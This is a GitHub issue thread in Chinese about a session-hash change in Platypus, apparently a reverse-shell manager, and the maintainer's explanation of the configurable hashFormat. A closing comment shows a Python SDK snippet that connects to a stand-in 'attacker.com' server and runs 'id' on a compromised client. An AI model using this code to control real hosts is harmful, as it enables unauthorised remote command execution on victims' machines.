### ISSUE TITLE
1.2.9版本 MD5计算有问题，与ip:port的md5计算值不符

### ISSUE THREAD

**Issue by pinkiecircle** [WangYihang/Platypus#35]
#### Description
```
尝试了上一版本是正常的
```

#### Reproduce
1. `go run platypus.go`
2. `Run 0.0.0.0 8080`
...

#### Environments
 - OS: Ubuntu 18.04.1 LTS
 - Version: 1.1.0

**Comment by WangYihang** [comment]
在 v1.2.9 中，为了实现灵活的对同一个来源主机的 Session 进行维护，所以 Hash 不再使用 `ip:port` 的模式。
目前使用的 Hash 模式可以通过[配置文件](https://github.com/WangYihang/Platypus/blob/master/lib/runtime/config.example.yml)灵活修改。在 Platypus 运行时，若当前文件夹无配置文件，则会自动生成默认配置文件。
目前默认 1337 端口的 Hash 模式为：
```
    # `%i` IP
    # `%u` Username
    # `%m` MAC address
    # `%o` Operating System
    # `%t` Income TimeStamp
    hashFormat: "%i %u %m %o"
```
1338 端口的模式为
```
hashFormat: "%i %u %m %o %t"
```
这样做的好处是：
* 用户可以灵活定义 Hash 模式
* 1337 端口上线的客户端，每个主机上的用户只保留一个（即：有重复上线检测）
* 1338 端口上线的客户端，无重复上线检测（关键在于时间戳，我们默认在一毫秒内，不存在相同来源 IP，相同用户的多个连接请求）

如果您有自己定制化的需求可以直接修改配置文件，然后重启 Platypus 即可。
针对不同的 Server 也可以进行单独的配置。

**Comment by WangYihang** [comment]
如果您是需要使用 RESTful 的功能，可能需要对 SDK 的客户端代码中 Hash 的部分进行对应修改。
后续会提供各种语言的 RESTful  SDK，到时候控制机器只需要调用 SDK 里的 API 即可。

**Comment by WangYihang** [comment]
> 如果您是需要使用 RESTful 的功能，可能需要对 SDK 的客户端代码中 Hash 的部分进行对应修改。
> 后续会提供各种语言的 RESTful SDK，到时候控制机器只需要调用 SDK 里的 API 即可（见[文档](https://github.com/WangYihang/Platypus/blob/master/doc/RESTful.md)）。

基于 [Platypus v1.3.1](https://github.com/WangYihang/Platypus/releases/tag/v1.3.1) 的 [Python SDK](https://github.com/WangYihang/Platypus-Python) 已发布。
```bash
pip install platypus-python
```
```python
import platypus_python as pp

p = pp.Platypus("attacker.com", 7331)
server = p.create_server("0.0.0.0", 13339)
# wait for client connections
clients = server.get_clients()
client = clients[0]
client.system("id")
```

**Comment by pinkiecircle** [comment]
谢谢大佬解答。工具很棒。

**Comment by WangYihang** [comment]
:D 如果使用中有什么问题欢迎提 Issue，感谢！那如果没有别的问题，这个 Issue 我就关辽。
